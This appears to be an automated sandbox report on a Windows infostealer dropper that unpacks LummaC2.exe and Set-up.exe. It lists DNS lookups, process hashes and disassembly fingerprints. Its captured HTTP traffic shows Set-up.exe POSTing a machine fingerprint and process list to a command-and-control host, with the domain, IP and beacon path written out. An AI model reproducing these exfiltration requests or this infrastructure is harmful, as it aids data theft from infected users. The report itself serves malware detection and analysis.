                                            Jan 12, 2025 17:45:22.664364100 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664376020 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664387941 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664401054 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664413929 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664428949 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664467096 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664494038 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664520979 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664561987 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664589882 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664639950 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664666891 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664696932 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664724112 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664751053 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664777994 CET8049723176.53.147.104192.168.2.5
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                 Type            Class        DNS over HTTPS
Jan 12, 2025 17:45:18.875922918 CET  192.168.2.5  1.1.1.1  0x6c4a    Standard query (0)  httpbin.org          A (IP address)  IN (0x0001)  false
Jan 12, 2025 17:45:18.876012087 CET  192.168.2.5  1.1.1.1  0x19ea    Standard query (0)  httpbin.org          28              IN (0x0001)  false
Jan 12, 2025 17:45:21.204427958 CET  192.168.2.5  1.1.1.1  0x3494    Standard query (0)  home.twelve12vs.top  A (IP address)  IN (0x0001)  false
Jan 12, 2025 17:45:21.204478979 CET  192.168.2.5  1.1.1.1  0x45eb    Standard query (0)  home.twelve12vs.top  28              IN (0x0001)  false
Jan 12, 2025 17:45:25.964458942 CET  192.168.2.5  1.1.1.1  0x155c    Standard query (0)  home.twelve12vs.top  A (IP address)  IN (0x0001)  false
Jan 12, 2025 17:45:25.964495897 CET  192.168.2.5  1.1.1.1  0x16d9    Standard query (0)  home.twelve12vs.top  28              IN (0x0001)  false
Jan 12, 2025 17:45:27.093185902 CET  192.168.2.5  1.1.1.1  0x8852    Standard query (0)  home.twelve12vs.top  A (IP address)  IN (0x0001)  false
Jan 12, 2025 17:45:27.093252897 CET  192.168.2.5  1.1.1.1  0x57ad    Standard query (0)  home.twelve12vs.top  28              IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                         CName  Address          Type            Class        DNS over HTTPS
Jan 12, 2025 17:45:16.087816000 CET  1.1.1.1    192.168.2.5  0x5786    No error (0)  bg.microsoft.map.fastly.net  -      199.232.210.172  A (IP address)  IN (0x0001)  false
Jan 12, 2025 17:45:16.087816000 CET  1.1.1.1    192.168.2.5  0x5786    No error (0)  bg.microsoft.map.fastly.net  -      199.232.214.172  A (IP address)  IN (0x0001)  false
Jan 12, 2025 17:45:18.883223057 CET  1.1.1.1    192.168.2.5  0x6c4a    No error (0)  httpbin.org                  -      3.210.94.60      A (IP address)  IN (0x0001)  false
Jan 12, 2025 17:45:18.883223057 CET  1.1.1.1    192.168.2.5  0x6c4a    No error (0)  httpbin.org                  -      50.19.58.113     A (IP address)  IN (0x0001)  false
Jan 12, 2025 17:45:21.925106049 CET  1.1.1.1    192.168.2.5  0x3494    No error (0)  home.twelve12vs.top          -      176.53.147.104   A (IP address)  IN (0x0001)  false
Jan 12, 2025 17:45:26.276388884 CET  1.1.1.1    192.168.2.5  0x155c    No error (0)  home.twelve12vs.top          -      176.53.147.104   A (IP address)  IN (0x0001)  false
Jan 12, 2025 17:45:28.059586048 CET  1.1.1.1    192.168.2.5  0x8852    No error (0)  home.twelve12vs.top          -      176.53.147.104   A (IP address)  IN (0x0001)  false
                                            • httpbin.org
                                            • home.twelve12vs.top
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49723        176.53.147.104  80                3128  C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp                            Bytes transferred  Direction  Data
Jan 12, 2025 17:45:21.936119080 CET  12360              OUT        POST /AvWHJxAVCxPehbRictmJ1736163220 HTTP/1.1
Host: home.twelve12vs.top
Accept: */*
Content-Type: application/json
Content-Length: 529138
                                            Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 38 38 37 35 35 35 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                            Data Ascii: { "ip": "8.46.123.189", "current_time": "8428488241958875551", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe" [TRUNCATED]
Jan 12, 2025 17:45:25.949558020 CET  138                IN         HTTP/1.1 200 OK
server: nginx/1.22.1
date: Sun, 12 Jan 2025 16:45:25 GMT
content-type: text/html; charset=utf-8
content-length: 1
Data Raw: 30
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.5  49744        176.53.147.104  80                3128  C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp                            Bytes transferred  Direction  Data
Jan 12, 2025 17:45:26.282490015 CET  99                 OUT        GET /AvWHJxAVCxPehbRictmJ1736163220?argument=0 HTTP/1.1
Host: home.twelve12vs.top
Accept: */*
Jan 12, 2025 17:45:27.083122015 CET  353                IN         HTTP/1.1 404 NOT FOUND
server: nginx/1.22.1
date: Sun, 12 Jan 2025 16:45:26 GMT
content-type: text/html; charset=utf-8
content-length: 207
                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                            Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.5  49761        176.53.147.104  80                3128  C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp                            Bytes transferred  Direction  Data
Jan 12, 2025 17:45:28.065629959 CET  172                OUT        POST /AvWHJxAVCxPehbRictmJ1736163220 HTTP/1.1
Host: home.twelve12vs.top
Accept: */*
Content-Type: application/json
Content-Length: 31
Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
Data Ascii: { "id1": "0", "data": "Done1" }
Jan 12, 2025 17:45:28.951916933 CET  353                IN         HTTP/1.1 404 NOT FOUND
server: nginx/1.22.1
date: Sun, 12 Jan 2025 16:45:28 GMT
content-type: text/html; charset=utf-8
content-length: 207
                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                            Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49720        3.210.94.60     443               3128  C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-12 16:45:19 UTC  52                 OUT        GET /ip HTTP/1.1
Host: httpbin.org
Accept: */*
2025-01-12 16:45:19 UTC  224                IN         HTTP/1.1 200 OK
Date: Sun, 12 Jan 2025 16:45:19 GMT
Content-Type: application/json
Content-Length: 31
Connection: close
Server: gunicorn/19.9.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
2025-01-12 16:45:19 UTC  31                 IN         Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
Data Ascii: { "origin": "8.46.123.189"}


Target ID: 0
Start time: 11:45:17
Start date: 12/01/2025
Path: C:\Users\user\Desktop\jo0PnKm2Lg.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\jo0PnKm2Lg.exe"
Imagebase: 0x950000
File size: 8'259'584 bytes
MD5 hash: 8398FC4AA3A5A5AB6AE7ED394B449D0A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 11:45:17
Start date: 12/01/2025
Path: C:\Users\user\AppData\Local\Temp\LummaC2.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\LummaC2.exe"
Imagebase: 0xdf0000
File size: 328'192 bytes
MD5 hash: 8DA89B163D506BE4A73B987517A1B9E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 68%, ReversingLabs
Reputation: low
Has exited: false

Target ID: 3
Start time: 11:45:18
Start date: 12/01/2025
Path: C:\Users\user\AppData\Local\Temp\Set-up.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\Set-up.exe"
Imagebase: 0xf70000
File size: 7'920'776 bytes
MD5 hash: 53D48938C0EC850EB316CF433ECFC045
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 75%, ReversingLabs
Reputation: low
Has exited: true

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2189682913.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_18a0000_jo0PnKm2Lg.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8aq
                                              • API String ID: 0-538729646
                                              • Opcode ID: 7a7e338895234b971f1cd3332d9063c69627a3d3e2fd2cf488018dde59c6de47
                                              • Instruction ID: 72a7f49cd3cb05d533e5db87d31125210671697adcfa6c240fa94b9bc43e2067
                                              • Opcode Fuzzy Hash: 7a7e338895234b971f1cd3332d9063c69627a3d3e2fd2cf488018dde59c6de47
                                              • Instruction Fuzzy Hash: C87116317002018FE724EB78D094B29BBA6FB85314F958069E509CB395DB34FD42CB81
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2189682913.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_18a0000_jo0PnKm2Lg.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 63b5960ea41c97268f837f63a6618240ee0552d1329f8e99cf061922b802cd22
                                              • Instruction ID: cf4dffc4c112fb2876eae6b05bb134c06a670c20dbd397efaedac3a965726324
                                              • Opcode Fuzzy Hash: 63b5960ea41c97268f837f63a6618240ee0552d1329f8e99cf061922b802cd22
                                              • Instruction Fuzzy Hash: 1951FA34A0134ACFCB15DFB4E69069EBBB6FF46304F5085A9C404AB254DB3A594ACF92
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2189682913.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_18a0000_jo0PnKm2Lg.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7c46f672333b7b954593badbbd7e33998d22d27ce860d63fc443c231e7459d3c
                                              • Instruction ID: 2f11f968cc448737dd6e95590204bb79e8077e071d2e0edf1cb73d1f0c506fef
                                              • Opcode Fuzzy Hash: 7c46f672333b7b954593badbbd7e33998d22d27ce860d63fc443c231e7459d3c
                                              • Instruction Fuzzy Hash: 1741ED34A0120ACFCB15DFB4E69069EBBB6FF46304F508569C414AB354DB3A5D4ACF92
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2189682913.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_18a0000_jo0PnKm2Lg.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fd39159852ff5e1223f93930b5b5e76d2b23a3d4679635ee401a4105bcdbb4a0
                                              • Instruction ID: 436e1eb0ae406bfbe565c6bdb136005818b022dfefbe5ae36c1063464aec7765
                                              • Opcode Fuzzy Hash: fd39159852ff5e1223f93930b5b5e76d2b23a3d4679635ee401a4105bcdbb4a0
                                              • Instruction Fuzzy Hash: AD312432B002164BDB05DBBDD5805AEBBF5EF84714F54416AE449DB242DB34EE06CBD2

                                              Execution Graph

                                              Execution Coverage:1.4%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:46.3%
                                              Total number of Nodes:54
                                              Total number of Limit Nodes:2

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: !$$$&$($*$0$4$5$6$6$<$=$>$A$A$A$C$E$G$I$K$M$O$Q$S$U$W$Y$[$\$]$]$_$c$g$h$k$l$u$w$w$z$}$}
                                              • API String ID: 0-4139699962
                                              • Opcode ID: 7734422600bed35e36f2a3215b9a50e3fe29479313ce5bea4786192f3a99e5c9
                                              • Instruction ID: b23b07fe90de61d792658083a059b2d21c41f7ce18ff73828aaa618701da3788
                                              • Opcode Fuzzy Hash: 7734422600bed35e36f2a3215b9a50e3fe29479313ce5bea4786192f3a99e5c9
                                              • Instruction Fuzzy Hash: 0E120C219087E9C9DB32C67C8C087CDBFA15B63324F1843D9D4E96B2D2D7754A86CB62

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentProcessId.KERNEL32 ref: 00DF8754
                                              • GetCurrentThreadId.KERNEL32 ref: 00DF875E
                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00DF8809
                                              • GetForegroundWindow.USER32 ref: 00DF88B1
                                              • ExitProcess.KERNEL32 ref: 00DF8A69
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                              • String ID:
                                              • API String ID: 4063528623-0
                                              • Opcode ID: 414af9b2920d640aa4d340650c30cfd9cc8689d452b4aede19d11ef5e85f46a1
                                              • Instruction ID: 903b1fa119a572b2847756c6dadf7aef9ae9150204b9e9dd795ad36c77a5ce6e
                                              • Opcode Fuzzy Hash: 414af9b2920d640aa4d340650c30cfd9cc8689d452b4aede19d11ef5e85f46a1
                                              • Instruction Fuzzy Hash: EF816E73A543184FD318AF69DC8537AFAD69BC4300F0F813D9988EB391DEB49C098692

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$R_XY$he$he
                                              • API String ID: 0-2939806299
                                              • Opcode ID: d677fe659fdfd59812ba93dc50ea45e60b25525f49b422b51f238b1fa58ba166
                                              • Instruction ID: 2bdd704f87e9cae7463d7edf8042b60c585089d0eca18a470b7f6bdbfafce50d
                                              • Opcode Fuzzy Hash: d677fe659fdfd59812ba93dc50ea45e60b25525f49b422b51f238b1fa58ba166
                                              • Instruction Fuzzy Hash: 615190701083048FD714CF15D899B6BBBF2FFD5318F549A2CE695A72A1E73A8805CB52

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 109 e323f0-e32422 LdrInitializeThunk
                                              APIs
                                              • LdrInitializeThunk.NTDLL(00E35730,?,00000018,?,?,00000018,?,?,?), ref: 00E3241E
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 105 e32610-e3275a GetForegroundWindow call e34560 108 e3275f-e32779 105->108
                                              APIs
                                              • GetForegroundWindow.USER32 ref: 00E3274F
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: ForegroundWindow
                                              • String ID:
                                              • API String ID: 2020703349-0
                                              • Opcode ID: e3127d8bb34b921cc09dafce32c43fc8bd341984f854adacb6c095bea373c1d6
                                              • Instruction ID: 96b3d4aa63ae3d5673f0a0bfa8993c74819fc96bd10a0a42f87ad0ff3a698991
                                              • Opcode Fuzzy Hash: e3127d8bb34b921cc09dafce32c43fc8bd341984f854adacb6c095bea373c1d6
                                              • Instruction Fuzzy Hash: 4BE0C2BAA04145DFC708CF16FD094343FB0A78A308700141DE207E33A1D634650ECB52

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 110 e30b80-e30b97 call e33b10 RtlAllocateHeap
                                              APIs
                                              • RtlAllocateHeap.NTDLL(?,00000000,?,00000000,00DF89C0,23220120), ref: 00E30B90
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: adf6f4f1a9dec73bf75c398ebc657ed33b2853beaef29f8eb0362b262692901a
                                              • Instruction ID: 04e75b4c79c7b9c80edd558225b63d0af8e6297aa244fe07bc9c130e08ebdb2e
                                              • Opcode Fuzzy Hash: adf6f4f1a9dec73bf75c398ebc657ed33b2853beaef29f8eb0362b262692901a
                                              • Instruction Fuzzy Hash: D3C09B31545120AFC6102B25FC09FC67FA8FF46351F050451B00477076C765AC53C6D5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $$&$'$($+$,$-$-H!a$-H!a$/$1$2$3$4%jm$4%j$4%j$:$<$=$>$>$?$?$@$A$B$C$D$D$D$E$G$I$J$L$M$M$N$N$O$O$P$P$R$T$U$U$V$W$Z$[$`$`$a$b$c$d$e$f$g$h$h$i$j$j$k$l$m$n$n$o$p$q$r$s$u$u$w$w$x$y$z${$}$~
                                              • API String ID: 0-1262017598
                                              • Opcode ID: fc67add124b3cd90ee84e41055c622bf9e2596454094b3e6e0a0a1366106c8de
                                              • Instruction ID: 9a61e6e1eebacb8e11bb835f0480698064da1e3d18e0549dcee174765a6d5016
                                              • Opcode Fuzzy Hash: fc67add124b3cd90ee84e41055c622bf9e2596454094b3e6e0a0a1366106c8de
                                              • Instruction Fuzzy Hash: 3013F1B150C7C08AD334DB3888483AFBFD1AB96324F188A2DE5E9973D2D77985858753

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: !$$$&$($*$0$4$5$6$6$<$=$>$A$A$A$C$E$G$I$K$M$O$Q$S$U$W$Y$[$\$]$]$_$c$g$h$k$l$u$w$w$z$}$}
                                              • API String ID: 0-4139699962
                                              • Opcode ID: 96f62e82473549ecfce5c989dd62f1cc802a05f55cd8489a30100b4a68338305
                                              • Instruction ID: 3dfac53d8f76d98d7c93289d58aaa4f2ab50217bbb18f414ee29856e57fe949a
                                              • Opcode Fuzzy Hash: 96f62e82473549ecfce5c989dd62f1cc802a05f55cd8489a30100b4a68338305
